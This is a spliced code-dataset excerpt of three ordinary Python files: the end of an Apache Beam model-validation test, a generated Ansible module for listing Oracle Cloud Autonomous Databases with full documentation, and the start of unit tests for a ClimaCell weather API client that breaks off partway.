created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{'cmd': self.CMD_EDIT_RULES}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation\n .ValidatePlatformParameterSnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n {'cmd': self.CMD_EDIT_RULES},\n 'The following required attributes are missing: new_rules')\n ])\n\n def test_param_change_object_with_extra_attribute_in_cmd_raises_exception(\n self):\n commit_dict = {\n 'cmd': self.CMD_EDIT_RULES,\n 'new_rules': [],\n 'invalid': 'invalid'\n }\n invalid_commit_cmd_model = (\n config_models.PlatformParameterSnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[commit_dict])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation\n .ValidatePlatformParameterSnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n commit_dict,\n 'The following extra attributes are present: invalid')\n ])\n"} {"ext": "py", "sha": "1a30c87670ba473f0b83f3308ae6b632f3c91bc2", "content": "#!/usr/bin/python\n# Copyright (c) 2017, 2020 Oracle and/or its affiliates.\n# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n# Apache License v2.0\n# See LICENSE.TXT for details.\n# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN\n\n\nfrom __future__ import absolute_import, division, print_function\n\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n \"metadata_version\": \"1.1\",\n \"status\": [\"preview\"],\n \"supported_by\": \"community\",\n}\n\nDOCUMENTATION = \"\"\"\n---\nmodule: oci_database_autonomous_database_facts\nshort_description: Fetches details about one or multiple AutonomousDatabase resources in Oracle Cloud Infrastructure\ndescription:\n - Fetches details about one or multiple AutonomousDatabase resources in Oracle Cloud Infrastructure\n - Gets a list of Autonomous Databases based on the query parameters specified.\n - If I(autonomous_database_id) is specified, the details of a single AutonomousDatabase will be returned.\nversion_added: \"2.9\"\nauthor: Oracle (@oracle)\noptions:\n autonomous_database_id:\n description:\n - The database L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm).\n - Required to get a specific autonomous_database.\n type: str\n aliases: [\"id\"]\n compartment_id:\n description:\n - The compartment L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm).\n - Required to list multiple autonomous_databases.\n type: str\n autonomous_container_database_id:\n description:\n - The Autonomous Container Database L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm).\n type: str\n sort_by:\n description:\n - The field to sort by. You can provide one sort order (`sortOrder`). Default order for TIMECREATED is descending. Default order for DISPLAYNAME\n is ascending. The DISPLAYNAME sort order is case sensitive.\n - \"**Note:** If you do not include the availability domain filter, the resources are grouped by availability domain, then sorted.\"\n type: str\n choices:\n - \"TIMECREATED\"\n - \"DISPLAYNAME\"\n sort_order:\n description:\n - The sort order to use, either ascending (`ASC`) or descending (`DESC`).\n type: str\n choices:\n - \"ASC\"\n - \"DESC\"\n infrastructure_type:\n description:\n - A filter to return only resources that match the given Infrastructure Type.\n type: str\n choices:\n - \"CLOUD\"\n - \"CLOUD_AT_CUSTOMER\"\n lifecycle_state:\n description:\n - A filter to return only resources that match the given lifecycle state exactly.\n type: str\n choices:\n - \"PROVISIONING\"\n - \"AVAILABLE\"\n - \"STOPPING\"\n - \"STOPPED\"\n - \"STARTING\"\n - \"TERMINATING\"\n - \"TERMINATED\"\n - \"UNAVAILABLE\"\n - \"RESTORE_IN_PROGRESS\"\n - \"RESTORE_FAILED\"\n - \"BACKUP_IN_PROGRESS\"\n - \"SCALE_IN_PROGRESS\"\n - \"AVAILABLE_NEEDS_ATTENTION\"\n - \"UPDATING\"\n - \"MAINTENANCE_IN_PROGRESS\"\n - \"RESTARTING\"\n - \"RECREATING\"\n - \"ROLE_CHANGE_IN_PROGRESS\"\n - \"UPGRADING\"\n db_workload:\n description:\n - A filter to return only autonomous database resources that match the specified workload type.\n type: str\n choices:\n - \"OLTP\"\n - \"DW\"\n - \"AJD\"\n db_version:\n description:\n - A filter to return only autonomous database resources that match the specified dbVersion.\n type: str\n is_free_tier:\n description:\n - Filter on the value of the resource's 'isFreeTier' property. A value of `true` returns only Always Free resources.\n A value of `false` excludes Always Free resources from the returned results. Omitting this parameter returns both Always Free and paid resources.\n type: bool\n display_name:\n description:\n - A filter to return only resources that match the entire display name given. The match is not case sensitive.\n type: str\n aliases: [\"name\"]\n is_refreshable_clone:\n description:\n - Filter on the value of the resource's 'isRefreshableClone' property. A value of `true` returns only refreshable clones.\n A value of `false` excludes refreshable clones from the returned results. Omitting this parameter returns both refreshable clones and databases\n that are not refreshable clones.\n type: bool\n is_data_guard_enabled:\n description:\n - A filter to return only resources that have Data Guard enabled.\n type: bool\nextends_documentation_fragment: [ oracle.oci.oracle ]\n\"\"\"\n\nEXAMPLES = \"\"\"\n- name: List autonomous_databases\n oci_database_autonomous_database_facts:\n compartment_id: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx\n\n- name: Get a specific autonomous_database\n oci_database_autonomous_database_facts:\n autonomous_database_id: ocid1.autonomousdatabase.oc1..xxxxxxEXAMPLExxxxxx\n\n\"\"\"\n\nRETURN = \"\"\"\nautonomous_databases:\n description:\n - List of AutonomousDatabase resources\n returned: on success\n type: complex\n contains:\n id:\n description:\n - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the Autonomous Database.\n returned: on success\n type: string\n sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx\n compartment_id:\n description:\n - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the compartment.\n returned: on success\n type: string\n sample: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx\n lifecycle_state:\n description:\n - The current state of the Autonomous Database.\n returned: on success\n type: string\n sample: PROVISIONING\n lifecycle_details:\n description:\n - Information about the current lifecycle state.\n returned: on success\n type: string\n sample: lifecycle_details_example\n db_name:\n description:\n - The database name.\n returned: on success\n type: string\n sample: db_name_example\n is_free_tier:\n description:\n - Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of\n memory. For Always Free databases, memory and CPU cannot be scaled.\n returned: on success\n type: bool\n sample: true\n system_tags:\n description:\n - System tags for this resource. Each key is predefined and scoped to a namespace.\n For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).\n returned: on success\n type: dict\n sample: {}\n time_reclamation_of_free_autonomous_database:\n description:\n - The date and time the Always Free database will be stopped because of inactivity. If this time is reached without any database activity, the\n database will automatically be put into the STOPPED state.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n time_deletion_of_free_autonomous_database:\n description:\n - The date and time the Always Free database will be automatically deleted because of inactivity. If the database is in the STOPPED state and\n without activity until this time, it will be deleted.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n backup_config:\n description:\n - \"\"\n returned: on success\n type: complex\n contains:\n manual_backup_bucket_name:\n description:\n - Name of L(Object Storage,https://docs.cloud.oracle.com/Content/Object/Concepts/objectstorageoverview.htm) bucket to use for storing\n manual backups.\n returned: on success\n type: string\n sample: manual_backup_bucket_name_example\n manual_backup_type:\n description:\n - The manual backup destination type.\n returned: on success\n type: string\n sample: NONE\n cpu_core_count:\n description:\n - The number of OCPU cores to be made available to the database.\n returned: on success\n type: int\n sample: 56\n data_storage_size_in_tbs:\n description:\n - The quantity of data in the database, in terabytes.\n returned: on success\n type: int\n sample: 56\n infrastructure_type:\n description:\n - The infrastructure type this resource belongs to.\n returned: on success\n type: string\n sample: CLOUD\n is_dedicated:\n description:\n - True if the database uses L(dedicated Exadata infrastructure,https://docs.cloud.oracle.com/Content/Database/Concepts/adbddoverview.htm).\n returned: on success\n type: bool\n sample: true\n autonomous_container_database_id:\n description:\n - The Autonomous Container Database L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm).\n returned: on success\n type: string\n sample: ocid1.autonomouscontainerdatabase.oc1..xxxxxxEXAMPLExxxxxx\n time_created:\n description:\n - The date and time the Autonomous Database was created.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n display_name:\n description:\n - The user-friendly name for the Autonomous Database. The name does not have to be unique.\n returned: on success\n type: string\n sample: display_name_example\n service_console_url:\n description:\n - The URL of the Service Console for the Autonomous Database.\n returned: on success\n type: string\n sample: service_console_url_example\n connection_strings:\n description:\n - The connection string used to connect to the Autonomous Database. The username for the Service Console is ADMIN. Use the password you entered\n when creating the Autonomous Database for the password value.\n returned: on success\n type: complex\n contains:\n high:\n description:\n - The High database service provides the highest level of resources to each SQL statement resulting in the highest performance, but\n supports the fewest number of concurrent SQL statements.\n returned: on success\n type: string\n sample: high_example\n medium:\n description:\n - The Medium database service provides a lower level of resources to each SQL statement potentially resulting a lower level of\n performance, but supports more concurrent SQL statements.\n returned: on success\n type: string\n sample: medium_example\n low:\n description:\n - The Low database service provides the least level of resources to each SQL statement, but supports the most number of concurrent SQL\n statements.\n returned: on success\n type: string\n sample: low_example\n dedicated:\n description:\n - The database service provides the least level of resources to each SQL statement, but supports the most number of concurrent SQL\n statements.\n returned: on success\n type: string\n sample: dedicated_example\n all_connection_strings:\n description:\n - Returns all connection strings that can be used to connect to the Autonomous Database.\n For more information, please see L(Predefined Database Service Names for Autonomous Transaction\n Processing,https://docs.oracle.com/en/cloud/paas/atp-cloud/atpug/connect-predefined.html#GUID-9747539B-FD46-44F1-8FF8-F5AC650F15BE)\n returned: on success\n type: dict\n sample: {}\n connection_urls:\n description:\n - \"\"\n returned: on success\n type: complex\n contains:\n sql_dev_web_url:\n description:\n - Oracle SQL Developer Web URL.\n returned: on success\n type: string\n sample: sql_dev_web_url_example\n apex_url:\n description:\n - Oracle Application Express (APEX) URL.\n returned: on success\n type: string\n sample: apex_url_example\n machine_learning_user_management_url:\n description:\n - Oracle Machine Learning user management URL.\n returned: on success\n type: string\n sample: machine_learning_user_management_url_example\n license_model:\n description:\n - The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-\n premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud.\n License Included allows you to subscribe to new Oracle Database software licenses and the Database service.\n Note that when provisioning an Autonomous Database on L(dedicated Exadata\n infrastructure,https://docs.cloud.oracle.com/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute\n is already set at the\n Autonomous Exadata Infrastructure level. When using L(shared Exadata\n infrastructure,https://docs.cloud.oracle.com/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will\n supply the value of `BRING_YOUR_OWN_LICENSE`.\n returned: on success\n type: string\n sample: LICENSE_INCLUDED\n used_data_storage_size_in_tbs:\n description:\n - The amount of storage that has been used, in terabytes.\n returned: on success\n type: int\n sample: 56\n freeform_tags:\n description:\n - Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.\n For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).\n - \"Example: `{\\\\\"Department\\\\\": \\\\\"Finance\\\\\"}`\"\n returned: on success\n type: dict\n sample: {'Department': 'Finance'}\n defined_tags:\n description:\n - Defined tags for this resource. Each key is predefined and scoped to a namespace.\n For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).\n returned: on success\n type: dict\n sample: {'Operations': {'CostCenter': 'US'}}\n subnet_id:\n description:\n - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.\n - \"**Subnet Restrictions:**\n - For bare metal DB systems and for single node virtual machine DB systems, do not use a subnet that overlaps with 192.168.16.16/28.\n - For Exadata and virtual machine 2-node RAC systems, do not use a subnet that overlaps with 192.168.128.0/20.\n - For Autonomous Database, setting this will disable public secure access to the database.\"\n - These subnets are used by the Oracle Clusterware private interconnect on the database instance.\n Specifying an overlapping subnet will cause the private interconnect to malfunction.\n This restriction applies to both the client subnet and the backup subnet.\n returned: on success\n type: string\n sample: ocid1.subnet.oc1..xxxxxxEXAMPLExxxxxx\n nsg_ids:\n description:\n - \"A list of the L(OCIDs,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this\n resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about\n NSGs, see L(Security Rules,https://docs.cloud.oracle.com/Content/Network/Concepts/securityrules.htm).\n **NsgIds restrictions:**\n - Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.\"\n returned: on success\n type: list\n sample: []\n private_endpoint:\n description:\n - The private endpoint for the resource.\n returned: on success\n type: string\n sample: private_endpoint_example\n private_endpoint_label:\n description:\n - The private endpoint label for the resource. Setting this to an empty string, after the private endpoint database gets created, will change\n the same private endpoint database to the public endpoint database.\n returned: on success\n type: string\n sample: private_endpoint_label_example\n private_endpoint_ip:\n description:\n - The private endpoint Ip address for the resource.\n returned: on success\n type: string\n sample: private_endpoint_ip_example\n db_version:\n description:\n - A valid Oracle Database version for Autonomous Database.\n returned: on success\n type: string\n sample: db_version_example\n is_preview:\n description:\n - Indicates if the Autonomous Database version is a preview version.\n returned: on success\n type: bool\n sample: true\n db_workload:\n description:\n - \"The Autonomous Database workload type. The following values are valid:\"\n - \"- OLTP - indicates an Autonomous Transaction Processing database\n - DW - indicates an Autonomous Data Warehouse database\n - AJD - indicates an Autonomous JSON Database\"\n returned: on success\n type: string\n sample: OLTP\n is_access_control_enabled:\n description:\n - Indicates if the database-level access control is enabled.\n If disabled, database access is defined by the network security rules.\n If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While\n specifying `whitelistedIps` rules is optional,\n if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later\n using the `UpdateAutonomousDatabase` API operation or edit option in console.\n When creating a database clone, the desired access control setting should be specified. By default, database-level access control will be\n disabled for the clone.\n - This property is applicable only to Autonomous Databases on the Exadata Cloud@Customer platform.\n returned: on success\n type: bool\n sample: true\n whitelisted_ips:\n description:\n - The client IP access control list (ACL). This feature is available for autonomous databases on L(shared Exadata\n infrastructure,https://docs.cloud.oracle.com/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer.\n Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.\n - \"For shared Exadata infrastructure, this is an array of CIDR (Classless Inter-Domain Routing) notations for a subnet or VCN OCID.\n Use a semicolon (;) as a deliminator between the VCN-specific subnets or IPs.\n Example: `[\\\\\"1.1.1.1\\\\\",\\\\\"1.1.1.0/24\\\\\",\\\\\"ocid1.vcn.oc1.sea.<unique_id>\\\\\",\\\\\"ocid1.vcn.oc1.sea.<unique_id1>;1.1.1.1\\\\\",\\\\\"ocid1.vcn.oc1.se\n a.<unique_id2>;1.1.0.0/16\\\\\"]`\n For Exadata Cloud@Customer, this is an array of IP addresses or CIDR (Classless Inter-Domain Routing) notations.\n Example: `[\\\\\"1.1.1.1\\\\\",\\\\\"1.1.1.0/24\\\\\",\\\\\"1.1.2.25\\\\\"]`\"\n - For an update operation, if you want to delete all the IPs in the ACL, use an array with a single empty string entry.\n returned: on success\n type: list\n sample: []\n is_auto_scaling_enabled:\n description:\n - Indicates if auto scaling is enabled for the Autonomous Database CPU core count.\n returned: on success\n type: bool\n sample: true\n data_safe_status:\n description:\n - Status of the Data Safe registration for this Autonomous Database.\n returned: on success\n type: string\n sample: REGISTERING\n operations_insights_status:\n description:\n - Status of Operations Insights for this Autonomous Database.\n returned: on success\n type: string\n sample: ENABLING\n time_maintenance_begin:\n description:\n - The date and time when maintenance will begin.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n time_maintenance_end:\n description:\n - The date and time when maintenance will end.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n is_refreshable_clone:\n description:\n - Indicates whether the Autonomous Database is a refreshable clone.\n returned: on success\n type: bool\n sample: true\n time_of_last_refresh:\n description:\n - The date and time when last refresh happened.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n time_of_last_refresh_point:\n description:\n - The refresh point timestamp (UTC). The refresh point is the time to which the database was most recently refreshed. Data created after the\n refresh point is not included in the refresh.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n time_of_next_refresh:\n description:\n - The date and time of next refresh.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n open_mode:\n description:\n - The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.\n returned: on success\n type: string\n sample: READ_ONLY\n refreshable_status:\n description:\n - The refresh status of the clone. REFRESHING indicates that the clone is currently being refreshed with data from the source Autonomous\n Database.\n returned: on success\n type: string\n sample: REFRESHING\n refreshable_mode:\n description:\n - The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous\n Database.\n returned: on success\n type: string\n sample: AUTOMATIC\n source_id:\n description:\n - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that was cloned to create\n the current Autonomous Database.\n returned: on success\n type: string\n sample: ocid1.source.oc1..xxxxxxEXAMPLExxxxxx\n permission_level:\n description:\n - The Autonomous Database permission level. Restricted mode allows access only to admin users.\n returned: on success\n type: string\n sample: RESTRICTED\n time_of_last_switchover:\n description:\n - The timestamp of the last switchover operation for the Autonomous Database.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n time_of_last_failover:\n description:\n - The timestamp of the last failover operation.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n is_data_guard_enabled:\n description:\n - Indicates whether the Autonomous Database has Data Guard enabled.\n returned: on success\n type: bool\n sample: true\n failed_data_recovery_in_seconds:\n description:\n - Indicates the number of seconds of data loss for a Data Guard failover.\n returned: on success\n type: int\n sample: 56\n standby_db:\n description:\n - \"\"\n returned: on success\n type: complex\n contains:\n lag_time_in_seconds:\n description:\n - The amount of time, in seconds, that the data of the standby database lags the data of the primary database. Can be used to determine\n the potential data loss in the event of a failover.\n returned: on success\n type: int\n sample: 56\n lifecycle_state:\n description:\n - The current state of the Autonomous Database.\n returned: on success\n type: string\n sample: PROVISIONING\n lifecycle_details:\n description:\n - Additional information about the current lifecycle state.\n returned: on success\n type: string\n sample: lifecycle_details_example\n available_upgrade_versions:\n description:\n - List of Oracle Database versions available for a database upgrade. If there are no version upgrades available, this list is empty.\n returned: on success\n type: list\n sample: []\n key_store_id:\n description:\n - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the key store.\n returned: on success\n type: string\n sample: ocid1.keystore.oc1..xxxxxxEXAMPLExxxxxx\n key_store_wallet_name:\n description:\n - The wallet name for Oracle Key Vault.\n returned: on success\n type: string\n sample: key_store_wallet_name_example\n sample: [{\n \"id\": \"ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx\",\n \"compartment_id\": \"ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx\",\n \"lifecycle_state\": \"PROVISIONING\",\n \"lifecycle_details\": \"lifecycle_details_example\",\n \"db_name\": \"db_name_example\",\n \"is_free_tier\": true,\n \"system_tags\": {},\n \"time_reclamation_of_free_autonomous_database\": \"2013-10-20T19:20:30+01:00\",\n \"time_deletion_of_free_autonomous_database\": \"2013-10-20T19:20:30+01:00\",\n \"backup_config\": {\n \"manual_backup_bucket_name\": \"manual_backup_bucket_name_example\",\n \"manual_backup_type\": \"NONE\"\n },\n \"cpu_core_count\": 56,\n \"data_storage_size_in_tbs\": 56,\n \"infrastructure_type\": \"CLOUD\",\n \"is_dedicated\": true,\n \"autonomous_container_database_id\": \"ocid1.autonomouscontainerdatabase.oc1..xxxxxxEXAMPLExxxxxx\",\n \"time_created\": \"2013-10-20T19:20:30+01:00\",\n \"display_name\": \"display_name_example\",\n \"service_console_url\": \"service_console_url_example\",\n \"connection_strings\": {\n \"high\": \"high_example\",\n \"medium\": \"medium_example\",\n \"low\": \"low_example\",\n \"dedicated\": \"dedicated_example\",\n \"all_connection_strings\": {}\n },\n \"connection_urls\": {\n \"sql_dev_web_url\": \"sql_dev_web_url_example\",\n \"apex_url\": \"apex_url_example\",\n \"machine_learning_user_management_url\": \"machine_learning_user_management_url_example\"\n },\n \"license_model\": \"LICENSE_INCLUDED\",\n \"used_data_storage_size_in_tbs\": 56,\n \"freeform_tags\": {'Department': 'Finance'},\n \"defined_tags\": {'Operations': {'CostCenter': 'US'}},\n \"subnet_id\": \"ocid1.subnet.oc1..xxxxxxEXAMPLExxxxxx\",\n \"nsg_ids\": [],\n \"private_endpoint\": \"private_endpoint_example\",\n \"private_endpoint_label\": \"private_endpoint_label_example\",\n \"private_endpoint_ip\": \"private_endpoint_ip_example\",\n \"db_version\": \"db_version_example\",\n \"is_preview\": true,\n \"db_workload\": \"OLTP\",\n \"is_access_control_enabled\": true,\n \"whitelisted_ips\": [],\n \"is_auto_scaling_enabled\": true,\n \"data_safe_status\": \"REGISTERING\",\n \"operations_insights_status\": \"ENABLING\",\n \"time_maintenance_begin\": \"2013-10-20T19:20:30+01:00\",\n \"time_maintenance_end\": \"2013-10-20T19:20:30+01:00\",\n \"is_refreshable_clone\": true,\n \"time_of_last_refresh\": \"2013-10-20T19:20:30+01:00\",\n \"time_of_last_refresh_point\": \"2013-10-20T19:20:30+01:00\",\n \"time_of_next_refresh\": \"2013-10-20T19:20:30+01:00\",\n \"open_mode\": \"READ_ONLY\",\n \"refreshable_status\": \"REFRESHING\",\n \"refreshable_mode\": \"AUTOMATIC\",\n \"source_id\": \"ocid1.source.oc1..xxxxxxEXAMPLExxxxxx\",\n \"permission_level\": \"RESTRICTED\",\n \"time_of_last_switchover\": \"2013-10-20T19:20:30+01:00\",\n \"time_of_last_failover\": \"2013-10-20T19:20:30+01:00\",\n \"is_data_guard_enabled\": true,\n \"failed_data_recovery_in_seconds\": 56,\n \"standby_db\": {\n \"lag_time_in_seconds\": 56,\n \"lifecycle_state\": \"PROVISIONING\",\n \"lifecycle_details\": \"lifecycle_details_example\"\n },\n \"available_upgrade_versions\": [],\n \"key_store_id\": \"ocid1.keystore.oc1..xxxxxxEXAMPLExxxxxx\",\n \"key_store_wallet_name\": \"key_store_wallet_name_example\"\n }]\n\"\"\"\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils\nfrom ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (\n OCIResourceFactsHelperBase,\n get_custom_class,\n)\n\ntry:\n from oci.database import DatabaseClient\n\n HAS_OCI_PY_SDK = True\nexcept ImportError:\n HAS_OCI_PY_SDK = False\n\n\nclass AutonomousDatabaseFactsHelperGen(OCIResourceFactsHelperBase):\n \"\"\"Supported operations: get, list\"\"\"\n\n def get_required_params_for_get(self):\n return [\n \"autonomous_database_id\",\n ]\n\n def get_required_params_for_list(self):\n return [\n \"compartment_id\",\n ]\n\n def get_resource(self):\n return oci_common_utils.call_with_backoff(\n self.client.get_autonomous_database,\n autonomous_database_id=self.module.params.get(\"autonomous_database_id\"),\n )\n\n def list_resources(self):\n optional_list_method_params = [\n \"autonomous_container_database_id\",\n \"sort_by\",\n \"sort_order\",\n \"infrastructure_type\",\n \"lifecycle_state\",\n \"db_workload\",\n \"db_version\",\n \"is_free_tier\",\n \"display_name\",\n \"is_refreshable_clone\",\n \"is_data_guard_enabled\",\n ]\n optional_kwargs = dict(\n (param, self.module.params[param])\n for param in optional_list_method_params\n if self.module.params.get(param) is not None\n )\n return oci_common_utils.list_all_resources(\n self.client.list_autonomous_databases,\n compartment_id=self.module.params.get(\"compartment_id\"),\n **optional_kwargs\n )\n\n\nAutonomousDatabaseFactsHelperCustom = get_custom_class(\n \"AutonomousDatabaseFactsHelperCustom\"\n)\n\n\nclass ResourceFactsHelper(\n AutonomousDatabaseFactsHelperCustom, AutonomousDatabaseFactsHelperGen\n):\n pass\n\n\ndef main():\n module_args = oci_common_utils.get_common_arg_spec()\n module_args.update(\n dict(\n autonomous_database_id=dict(aliases=[\"id\"], type=\"str\"),\n compartment_id=dict(type=\"str\"),\n autonomous_container_database_id=dict(type=\"str\"),\n sort_by=dict(type=\"str\", choices=[\"TIMECREATED\", \"DISPLAYNAME\"]),\n sort_order=dict(type=\"str\", choices=[\"ASC\", \"DESC\"]),\n infrastructure_type=dict(\n type=\"str\", choices=[\"CLOUD\", \"CLOUD_AT_CUSTOMER\"]\n ),\n lifecycle_state=dict(\n type=\"str\",\n choices=[\n \"PROVISIONING\",\n \"AVAILABLE\",\n \"STOPPING\",\n \"STOPPED\",\n \"STARTING\",\n \"TERMINATING\",\n \"TERMINATED\",\n \"UNAVAILABLE\",\n \"RESTORE_IN_PROGRESS\",\n \"RESTORE_FAILED\",\n \"BACKUP_IN_PROGRESS\",\n \"SCALE_IN_PROGRESS\",\n \"AVAILABLE_NEEDS_ATTENTION\",\n \"UPDATING\",\n \"MAINTENANCE_IN_PROGRESS\",\n \"RESTARTING\",\n \"RECREATING\",\n \"ROLE_CHANGE_IN_PROGRESS\",\n \"UPGRADING\",\n ],\n ),\n db_workload=dict(type=\"str\", choices=[\"OLTP\", \"DW\", \"AJD\"]),\n db_version=dict(type=\"str\"),\n is_free_tier=dict(type=\"bool\"),\n display_name=dict(aliases=[\"name\"], type=\"str\"),\n is_refreshable_clone=dict(type=\"bool\"),\n is_data_guard_enabled=dict(type=\"bool\"),\n )\n )\n\n module = AnsibleModule(argument_spec=module_args)\n\n if not HAS_OCI_PY_SDK:\n module.fail_json(msg=\"oci python sdk required for this module.\")\n\n resource_facts_helper = ResourceFactsHelper(\n module=module,\n resource_type=\"autonomous_database\",\n service_client_class=DatabaseClient,\n namespace=\"database\",\n )\n\n result = []\n\n if resource_facts_helper.is_get():\n result = [resource_facts_helper.get()]\n elif resource_facts_helper.is_list():\n result = resource_facts_helper.list()\n else:\n resource_facts_helper.fail()\n\n module.exit_json(autonomous_databases=result)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a30c8c07446a29b3131db3c5e0363a440ade735", "content": "import json\nimport os\n\nfrom unittest import TestCase, mock\nfrom climacell.api import Client, Measurement, Response, Error\nfrom climacell.fields import (\n FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY,\n FIELD_WIND_SPEED, FIELD_WIND_GUST, FIELD_WIND_DIRECTION,\n FIELD_SUNRISE, FIELD_SUNSET,\n)\nfrom climacell.utils import join_fields\n\n\nERROR_FILE = os.path.dirname(__file__) + '/data/error_example.json'\nHOURLY_FILE = os.path.dirname(__file__) + '/data/hourly_example.json'\nDAILY_FILE = os.path.dirname(__file__) + '/data/daily_example.json'\nNOWCAST_FILE = os.path.dirname(__file__) + '/data/nowcast_example.json'\n\n\nclass MockResponse:\n def __init__(self, data, status_code):\n self.data = data\n self.status_code = status_code\n\n def json(self):\n return self.data\n\n\ndef mock_requests_get(*args, **kwargs):\n base_url = 'https://api.climacell.co/v3'\n\n if args[0] is None:\n return MockResponse(None, 404)\n elif args[0] == base_url + '/weather/forecast/hourly':\n file = HOURLY_FILE\n elif args[0] == base_url + '/weather/nowcast':\n file = NOWCAST_FILE\n elif args[0] == base_url + '/weather/forecast/daily':\n file = DAILY_FILE\n\n with open(file) as json_file:\n data = json.load(json_file)\n\n return MockResponse(data, 200)\n\n\nclass TestMeasurement(TestCase):\n def test_measurement__str__(self):\n m = Measurement('temp', 13.04, 'C', '2021-01-14T21:00:00.000Z')\n self.assertEqual('temp: 13.04 C at 2021-01-14 21:00:00+00:00', str(m))\n\n m = Measurement('temp', 13.04, None, '2021-01-14T21:00:00.000Z')\n self.assertEqual('temp: 13.04 at 2021-01-14 21:00:00+00:00', str(m))\n\n\nclass TestResponse(TestCase):\n def test_get_measurements_error(self):\n with open(ERROR_FILE) as f:\n data = json.load(f)\n mock_response = MockResponse(data, 400)\n response = Response(mock_response, [FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY])\n\n self.assertTrue(response.has_error)\n error = response.get_measurements()\n self.assertTrue(isinstance(error, Error))\n\n\nclass TestError(TestCase):\n def test_error(self):\n with open(ERROR_FILE) as f:\n data = json.load(f)\n\n error = Error(data)\n\n self.assertEqual(400, error.status_code)\n self.assertEqual('Message body content not allowed.', error.message)\n self.assertEqual('BadRequest', error.code)\n\n def test_error_str(self):\n with open(ERROR_FILE) as f:\n data = json.load(f)\n\n error = Error(data)\n expected_str = 'BadRequest (400): Message body content not allowed.'\n self.assertEqual(expected_str, str(error))\n\n\nclass TestClient(TestCase):\n @mock.patch('climacell.api.requests.get', side_effect=mock_requests_get)\n def test_hourly(self, mock_get):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n fields = [FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]\n\n response = client.hourly(lat=lat, lon=lon, fields=fields)\n measurements = response.get_measurements()\n\n expected_params = {\n 'lat': 52.446023244274045,\n 'lon': 4.819207798979252,\n 'start_time': 'now',\n 'unit_system': 'si',\n 'fields': join_fields([FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]),\n }\n\n mock_get.assert_called_with(\n 